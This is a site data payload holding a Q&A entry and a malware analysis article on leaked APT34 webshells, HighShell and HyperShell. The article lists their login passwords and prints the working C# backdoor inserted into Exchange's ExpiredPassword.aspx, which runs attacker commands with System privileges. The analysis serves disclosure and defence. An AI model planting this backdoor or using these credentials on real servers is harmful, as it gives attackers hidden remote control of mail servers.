[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fBqaw8xILbJDt_YP37hbv3dTf5IieFrv8uhfn4D3MOi4":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},1150,"What additional functions does HyperShell include besides the Exchange webshell?","HyperShell contains multiple components, including the `simple.aspx` webshell (password `MkRg5dm8MOk`), a stable version folder with `HighShellLocal` (a powerful multifunction webshell), and supporting libraries like `Newtonsoft.Json.dll` for JSON parsing. The `HighShellLocal` variant requires proper bin folder placement and supports various file and command operations, as outlined in the [analysis](\u002Fnews\u002Fanalysis-of-apt34-leaked-tools-highshell-and-hypershell).","\u003Cp>HyperShell contains multiple components, including the `simple.aspx` webshell (password `MkRg5dm8MOk`), a stable version folder with `HighShellLocal` (a powerful multifunction webshell), and supporting libraries like `Newtonsoft.Json.dll` for JSON parsing. The `HighShellLocal` variant requires proper bin folder placement and supports various file and command operations, as outlined in the [analysis](\u002Fnews\u002Fanalysis-of-apt34-leaked-tools-highshell-and-hypershell).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fanalysis-of-apt34-leaked-tools-highshell-and-hypershell\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-additional-functions-does-hypershell-include-besides-the-exchange-webshell-1777480228209","HyperShell, HighShellLocal, webshell, multifunction, dependencies, APT34",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},279,"Analysis of APT34 Leaked Tools - HighShell and HyperShell","analysis-of-apt34-leaked-tools-highshell-and-hypershell","Technical analysis of APT34's leaked HighShell and HyperShell webshells, including login credentials, Exchange backdoors, and command execution methods.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, six tools from APT34 were leaked. As the second article in the analysis series, this post focuses solely on the technical analysis of HighShell and HyperShell.\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmalware-research.org\u002Fapt34-hacking-tools-leak\u002Famp\u002F\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Analysis of HighShell\u003C\u002Fli>\u003Cli>Analysis of HyperShell\u003C\u002Fli>\u003Cli>Summary\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Analysis of HighShell\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The corresponding leaked file is named HighShell in Webshells_and_Panel\u003C\u002Fp>\u003Cp>The file in question is HighShell.aspx, a webshell targeting Windows servers.\u003C\u002Fp>\u003Cp>The default access page is shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016717552_0_ae95f32407.jpeg\">\u003C\u002Fp>\u003Cp>The login box is red and requires a connection password.\u003C\u002Fp>\u003Cp>The correct password is Th!sN0tF0rFAN.\u003C\u002Fp>\u003Cp>After entering the correct password, click 'Do it' and refresh the page to successfully log in, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016723379_1_34049c968b.jpeg\">\u003C\u002Fp>\u003Cp>The login box turns green.\u003C\u002Fp>\u003Cp>Public information about this tool:\u003C\u002Fp>\u003Cp>https:\u002F\u002Funit42.paloaltonetworks.com\u002Funit42-twoface-webshell-persistent-access-point-lateral-movement\u002F\u003C\u002Fp>\u003Cp>HighShell shares the same page as TwoFace mentioned in the Palo Alto Networks article.\u003C\u002Fp>\u003Ch2>0x03 Analysis of HyperShell\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The corresponding leaked file is named HyperShell in the Webshells_and_Panel folder.\u003C\u002Fp>\u003Cp>It contains the following 7 subfolders:\u003C\u002Fp>\u003Col>\u003Cli>ExpiredPasswordTech\u003C\u002Fli>\u003Cli>HyperShell\u003C\u002Fli>\u003Cli>Image\u003C\u002Fli>\u003Cli>Libraries\u003C\u002Fli>\u003Cli>packages\u003C\u002Fli>\u003Cli>ShellLocal\u003C\u002Fli>\u003Cli>StableVersion\u003C\u002Fli>\u003C\u002Fol>\u003Ch3>1.ExpiredPasswordTech\u003C\u002Fh3>\u003Cp>Includes 3 files:\u003C\u002Fp>\u003Cul>\u003Cli>error4.aspx, same functionality as HighShell.aspx but with unknown login credentials\u003C\u002Fli>\u003Cli>ExpiredPassword.aspx, webshell for Exchange\u003C\u002Fli>\u003Cli>MyMaster.aspx, generates string: NxKK\u003Ctjwn^lv-$*uz|z-h;cgl(o>7a\u003C\u002Ftjwn^lv-$*uz|z-h;cgl(o>\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>2.HyperShell\u003C\u002Fh3>\u003Cp>Contains multiple files, source code files for various webshells\u003C\u002Fp>\u003Cp>Includes another usable webshell, relative path: .\\Webshells_and_Panel\\HyperShell\\HyperShell\\Shell\\simple.aspx\u003C\u002Fp>\u003Cp>Connection password: MkRg5dm8MOk\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016729801_2_1fc72ebb4d.jpeg\">\u003C\u002Fp>\u003Ch3>3.Image\u003C\u002Fh3>\u003Cp>Image folder\u003C\u002Fp>\u003Ch3>4.Libraries\u003C\u002Fh3>\u003Cp>Contains multiple dependency files\u003C\u002Fp>\u003Ch3>5.packages\u003C\u002Fh3>\u003Cp>Contains multiple dependency files\u003C\u002Fp>\u003Ch3>6. ShellLocal\u003C\u002Fh3>\u003Cp>Empty folder\u003C\u002Fp>\u003Ch3>7. StableVersion\u003C\u002Fh3>\u003Cp>Stable version, contains multiple webshells\u003C\u002Fp>\u003Ch4>(1)ExpiredPassword.aspx\u003C\u002Fh4>\u003Cp>Webshell for Exchange\u003C\u002Fp>\u003Cp>Relative path: .\\Webshells_and_Panel\\HyperShell\\StableVersion\\HighShell v5.0\\HyperShell\\HyperShell\\ExpiredPasswordTech\u003C\u002Fp>\u003Cp>Same content as the file at relative path .\\Webshells_and_Panel\\HyperShell\\ExpiredPasswordTech\u003C\u002Fp>\u003Cp>ExpiredPassword.aspx is a normal Exchange function, corresponding to the page for resetting user passwords, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016733617_3_835fe1f736.jpeg\">\u003C\u002Fp>\u003Cp>Accessed URL: https:\u002F\u002F\u003Cdomain>\u002Fowa\u002Fauth\u002FExpiredPassword.aspx\u003C\u002Fdomain>\u003C\u002Fp>\u003Cp>Corresponding Windows absolute path: C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ExpiredPassword.aspx\u003C\u002Fp>\u003Cp>The default permission of the webshell at this path is System\u003C\u002Fp>\u003Cp>My test system has Exchange 2013 installed. I have uploaded the normal ExpiredPassword.aspx source code to GitHub:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.某开源项目.aspx(2013)\u003C\u002Fp>\u003Cp>The ExpiredPassword.aspx in HyperShell is a file with backdoor code added. Compared to the normal ExpiredPassword.aspx file in my test environment, there are multiple differences, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016737782_4_4b513bad34.jpeg\">\u003C\u002Fp>\u003Cp>After analysis, it may be due to differences in Exchange versions. Ignoring version differences, the main code added in HyperShell's ExpiredPassword.aspx is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>              &lt;%\u003Cbr>                    try{\u003Cbr>                    if (Convert.ToBase64String(new System.Security.Cryptography.SHA1Managed().ComputeHash(Encoding.ASCII.GetBytes(Encoding.ASCII.GetString(Convert.FromBase64String(Request.Form[\"newPwd1\"])) + \"reDGEa@#!%FS\"))) == \"+S6Kos9D\u002Fetq1cd\u002F\u002F\u002FfgTarVnUQ=\")\u003Cbr>                    {\u003Cbr>                        System.Diagnostics.Process p = new System.Diagnostics.Process();\u003Cbr>                        System.Diagnostics.ProcessStartInfo i = p.StartInfo;\u003Cbr>                        i.FileName = \"cmd\";\u003Cbr>                        i.Arguments = \"\u002Fc \" + Encoding.UTF8.GetString(Convert.FromBase64String(Request.Form[\"newPwd2\"]));\u003Cbr>                        i.UseShellExecute = false;\u003Cbr>                        i.CreateNoWindow = true;\u003Cbr>                        i.RedirectStandardOutput = true;\u003Cbr>                        p.Start();\u003Cbr>                        string r = p.StandardOutput.ReadToEnd();\u003Cbr>                        p.WaitForExit();\u003Cbr>                        p.Close();\u003Cbr>                        Response.Write(\"\u003C\u002Fp>\u003Cpre>\" + Server.HtmlEncode(r) + \"\u003C\u002Fpre>\");\u003Cbr>                        Response.End();\u003Cbr>                    }}catch{}\u003Cbr>                %&gt;\u003Cp>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Corresponding to my test environment, which is Exchange 2013, the code with payload added and verification steps removed has been uploaded to GitHub:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.某开源项目.aspx(2013)(HyperShell)\u003C\u002Fp>\u003Cp>The 'Confirm new password' field is used to pass the command to be executed, with System privileges\u003C\u002Fp>\u003Ch4>(2) HighShellLocal\u003C\u002Fh4>\u003Cp>A powerful webshell\u003C\u002Fp>\u003Cp>Relative path: .\\Webshells_and_Panel\\Webshells_and_Panel\\HyperShell\\StableVersion\\HighShell v5.0\\HyperShell\\HyperShell\\ShellLocal\\StableVersions\\ShellLocal-v8.8.5.rar\u003C\u002Fp>\u003Cp>Extract to the current directory, relative path is .\\ShellLocal-v8.8.5\\ShellLocal-v8.8.5\\HighShellLocal, including the following files:\u003C\u002Fp>\u003Cul>\u003Cli>Folder css\u003C\u002Fli>\u003Cli>Folder files\u003C\u002Fli>\u003Cli>Folder js\u003C\u002Fli>\u003Cli>HighShellLocal.aspx\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For actual use, the bin folder under .\\ShellLocal-v8.8.5\\ShellLocal-v8.8.5\\ is also required, otherwise a Json usage error will be prompted\u003C\u002Fp>\u003Cp>The complete structure is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>│   HighShellLocal.aspx\u003Cbr>│\u003Cbr>├───bin\u003Cbr>│       Newtonsoft.Json.dll\u003Cbr>│\u003Cbr>├───css\u003Cbr>│   │   main.css\u003Cbr>│   │\u003Cbr>│   └───img\u003Cbr>│           box-zipper.png\u003Cbr>│           download-cloud.png\u003Cbr>│           exclamation-diamond.png\u003Cbr>│           heart-break.png\u003Cbr>│           heart-empty.png\u003Cbr>│           heart.png\u003Cbr>│           minus-button.png\u003Cbr>│\u003Cbr>├───files\u003Cbr>│       7za.exe\u003Cbr>│       nbt.exe\u003Cbr>│       rx.exe\u003Cbr>│\u003Cbr>└───js\u003Cbr>    │   explorer.js\u003Cbr>    │   main.js\u003Cbr>    │   send.js\u003Cbr>    │   utility.js\u003Cbr>    │\u003Cbr>    ├───components\u003Cbr>    │      \u003Cbr>    ├───jquery\u003Cbr>    │       \u003Cbr>    └───semantic\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Login password: Th!sN0tF0rFAN\u003C\u002Fp>\u003Cp>The login page is shown in the following figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016740883_5_f60cbd106a.jpeg\">\u003C\u002Fp>\u003Cp>After entering the correct login password, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016744642_6_7eacb740b5.jpeg\">\u003C\u002Fp>\u003Cp>It can be seen that this webshell supports multiple functions\u003C\u002Fp>\u003Ch2>0x04 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article analyzes HighShell and HyperShell from the leaked files. The ExpiredPassword.aspx in HyperShell is a relatively concealed webshell. So far, I have not found this exploitation method in publicly available materials.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, six tools from APT34 were leaked. As the second article in the analysis series, this post focuses solely on the technical analysis of HighShell and HyperShell.\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmalware-research.org\u002Fapt34-hacking-tools-leak\u002Famp\u002F\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Analysis of HighShell\u003C\u002Fli>\u003Cli>Analysis of HyperShell\u003C\u002Fli>\u003Cli>Summary\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Analysis of HighShell\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The corresponding leaked file is named HighShell in Webshells_and_Panel\u003C\u002Fp>\u003Cp>The file in question is HighShell.aspx, a webshell targeting Windows servers.\u003C\u002Fp>\u003Cp>The default access page is shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016717552_0_ae95f32407-1.jpeg\">\u003C\u002Fp>\u003Cp>The login box is red and requires a connection password.\u003C\u002Fp>\u003Cp>The correct password is Th!sN0tF0rFAN.\u003C\u002Fp>\u003Cp>After entering the correct password, click 'Do it' and refresh the page to successfully log in, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016723379_1_34049c968b-1.jpeg\">\u003C\u002Fp>\u003Cp>The login box turns green.\u003C\u002Fp>\u003Cp>Public information about this tool:\u003C\u002Fp>\u003Cp>https:\u002F\u002Funit42.paloaltonetworks.com\u002Funit42-twoface-webshell-persistent-access-point-lateral-movement\u002F\u003C\u002Fp>\u003Cp>HighShell shares the same page as TwoFace mentioned in the Palo Alto Networks article.\u003C\u002Fp>\u003Ch2>0x03 Analysis of HyperShell\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The corresponding leaked file is named HyperShell in the Webshells_and_Panel folder.\u003C\u002Fp>\u003Cp>It contains the following 7 subfolders:\u003C\u002Fp>\u003Col>\u003Cli>ExpiredPasswordTech\u003C\u002Fli>\u003Cli>HyperShell\u003C\u002Fli>\u003Cli>Image\u003C\u002Fli>\u003Cli>Libraries\u003C\u002Fli>\u003Cli>packages\u003C\u002Fli>\u003Cli>ShellLocal\u003C\u002Fli>\u003Cli>StableVersion\u003C\u002Fli>\u003C\u002Fol>\u003Ch3>1.ExpiredPasswordTech\u003C\u002Fh3>\u003Cp>Includes 3 files:\u003C\u002Fp>\u003Cul>\u003Cli>error4.aspx, same functionality as HighShell.aspx but with unknown login credentials\u003C\u002Fli>\u003Cli>ExpiredPassword.aspx, webshell for Exchange\u003C\u002Fli>\u003Cli>MyMaster.aspx, generates string: NxKK\u003Ctjwn^lv-$*uz|z-h;cgl(o>7a\u003C\u002Ftjwn^lv-$*uz|z-h;cgl(o>\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>2.HyperShell\u003C\u002Fh3>\u003Cp>Contains multiple files, source code files for various webshells\u003C\u002Fp>\u003Cp>Includes another usable webshell, relative path: .\\Webshells_and_Panel\\HyperShell\\HyperShell\\Shell\\simple.aspx\u003C\u002Fp>\u003Cp>Connection password: MkRg5dm8MOk\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016729801_2_1fc72ebb4d-1.jpeg\">\u003C\u002Fp>\u003Ch3>3.Image\u003C\u002Fh3>\u003Cp>Image folder\u003C\u002Fp>\u003Ch3>4.Libraries\u003C\u002Fh3>\u003Cp>Contains multiple dependency files\u003C\u002Fp>\u003Ch3>5.packages\u003C\u002Fh3>\u003Cp>Contains multiple dependency files\u003C\u002Fp>\u003Ch3>6. ShellLocal\u003C\u002Fh3>\u003Cp>Empty folder\u003C\u002Fp>\u003Ch3>7. StableVersion\u003C\u002Fh3>\u003Cp>Stable version, contains multiple webshells\u003C\u002Fp>\u003Ch4>(1)ExpiredPassword.aspx\u003C\u002Fh4>\u003Cp>Webshell for Exchange\u003C\u002Fp>\u003Cp>Relative path: .\\Webshells_and_Panel\\HyperShell\\StableVersion\\HighShell v5.0\\HyperShell\\HyperShell\\ExpiredPasswordTech\u003C\u002Fp>\u003Cp>Same content as the file at relative path .\\Webshells_and_Panel\\HyperShell\\ExpiredPasswordTech\u003C\u002Fp>\u003Cp>ExpiredPassword.aspx is a normal Exchange function, corresponding to the page for resetting user passwords, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016733617_3_835fe1f736-1.jpeg\">\u003C\u002Fp>\u003Cp>Accessed URL: https:\u002F\u002F\u003Cdomain>\u002Fowa\u002Fauth\u002FExpiredPassword.aspx\u003C\u002Fdomain>\u003C\u002Fp>\u003Cp>Corresponding Windows absolute path: C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ExpiredPassword.aspx\u003C\u002Fp>\u003Cp>The default permission of the webshell at this path is System\u003C\u002Fp>\u003Cp>My test system has Exchange 2013 installed. I have uploaded the normal ExpiredPassword.aspx source code to GitHub:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.某开源项目.aspx(2013)\u003C\u002Fp>\u003Cp>The ExpiredPassword.aspx in HyperShell is a file with backdoor code added. Compared to the normal ExpiredPassword.aspx file in my test environment, there are multiple differences, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016737782_4_4b513bad34-1.jpeg\">\u003C\u002Fp>\u003Cp>After analysis, it may be due to differences in Exchange versions. Ignoring version differences, the main code added in HyperShell's ExpiredPassword.aspx is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>              &lt;%\u003Cbr>                    try{\u003Cbr>                    if (Convert.ToBase64String(new System.Security.Cryptography.SHA1Managed().ComputeHash(Encoding.ASCII.GetBytes(Encoding.ASCII.GetString(Convert.FromBase64String(Request.Form[\"newPwd1\"])) + \"reDGEa@#!%FS\"))) == \"+S6Kos9D\u002Fetq1cd\u002F\u002F\u002FfgTarVnUQ=\")\u003Cbr>                    {\u003Cbr>                        System.Diagnostics.Process p = new System.Diagnostics.Process();\u003Cbr>                        System.Diagnostics.ProcessStartInfo i = p.StartInfo;\u003Cbr>                        i.FileName = \"cmd\";\u003Cbr>                        i.Arguments = \"\u002Fc \" + Encoding.UTF8.GetString(Convert.FromBase64String(Request.Form[\"newPwd2\"]));\u003Cbr>                        i.UseShellExecute = false;\u003Cbr>                        i.CreateNoWindow = true;\u003Cbr>                        i.RedirectStandardOutput = true;\u003Cbr>                        p.Start();\u003Cbr>                        string r = p.StandardOutput.ReadToEnd();\u003Cbr>                        p.WaitForExit();\u003Cbr>                        p.Close();\u003Cbr>                        Response.Write(\"\u003C\u002Fp>\u003Cpre>\" + Server.HtmlEncode(r) + \"\u003C\u002Fpre>\");\u003Cbr>                        Response.End();\u003Cbr>                    }}catch{}\u003Cbr>                %&gt;\u003Cp>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Corresponding to my test environment, which is Exchange 2013, the code with payload added and verification steps removed has been uploaded to GitHub:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.某开源项目.aspx(2013)(HyperShell)\u003C\u002Fp>\u003Cp>The 'Confirm new password' field is used to pass the command to be executed, with System privileges\u003C\u002Fp>\u003Ch4>(2) HighShellLocal\u003C\u002Fh4>\u003Cp>A powerful webshell\u003C\u002Fp>\u003Cp>Relative path: .\\Webshells_and_Panel\\Webshells_and_Panel\\HyperShell\\StableVersion\\HighShell v5.0\\HyperShell\\HyperShell\\ShellLocal\\StableVersions\\ShellLocal-v8.8.5.rar\u003C\u002Fp>\u003Cp>Extract to the current directory, relative path is .\\ShellLocal-v8.8.5\\ShellLocal-v8.8.5\\HighShellLocal, including the following files:\u003C\u002Fp>\u003Cul>\u003Cli>Folder css\u003C\u002Fli>\u003Cli>Folder files\u003C\u002Fli>\u003Cli>Folder js\u003C\u002Fli>\u003Cli>HighShellLocal.aspx\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For actual use, the bin folder under .\\ShellLocal-v8.8.5\\ShellLocal-v8.8.5\\ is also required, otherwise a Json usage error will be prompted\u003C\u002Fp>\u003Cp>The complete structure is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>│   HighShellLocal.aspx\u003Cbr>│\u003Cbr>├───bin\u003Cbr>│       Newtonsoft.Json.dll\u003Cbr>│\u003Cbr>├───css\u003Cbr>│   │   main.css\u003Cbr>│   │\u003Cbr>│   └───img\u003Cbr>│           box-zipper.png\u003Cbr>│           download-cloud.png\u003Cbr>│           exclamation-diamond.png\u003Cbr>│           heart-break.png\u003Cbr>│           heart-empty.png\u003Cbr>│           heart.png\u003Cbr>│           minus-button.png\u003Cbr>│\u003Cbr>├───files\u003Cbr>│       7za.exe\u003Cbr>│       nbt.exe\u003Cbr>│       rx.exe\u003Cbr>│\u003Cbr>└───js\u003Cbr>    │   explorer.js\u003Cbr>    │   main.js\u003Cbr>    │   send.js\u003Cbr>    │   utility.js\u003Cbr>    │\u003Cbr>    ├───components\u003Cbr>    │      \u003Cbr>    ├───jquery\u003Cbr>    │       \u003Cbr>    └───semantic\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Login password: Th!sN0tF0rFAN\u003C\u002Fp>\u003Cp>The login page is shown in the following figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016740883_5_f60cbd106a-1.jpeg\">\u003C\u002Fp>\u003Cp>After entering the correct login password, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016744642_6_7eacb740b5-1.jpeg\">\u003C\u002Fp>\u003Cp>It can be seen that this webshell supports multiple functions\u003C\u002Fp>\u003Ch2>0x04 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article analyzes HighShell and HyperShell from the leaked files. The ExpiredPassword.aspx in HyperShell is a relatively concealed webshell. So far, I have not found this exploitation method in publicly available materials.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",82,"Onedaysec",3,"published","2026-02-02T07:25:19.686Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"APT34 HighShell & HyperShell Webshell Analysis - Leaked Tools","APT34, HighShell, HyperShell, webshell analysis, cybersecurity, malware, hacking tools, Exchange backdoor",null,false,[],{"docs":43,"hasNextPage":40},[44,4,45,46],1151,1149,1148,{"title":39,"description":39,"image":39},"2026-07-24T15:37:09.251Z","2026-07-23T16:02:35.924Z","draft","2026-07-23T16:17:01.595Z"]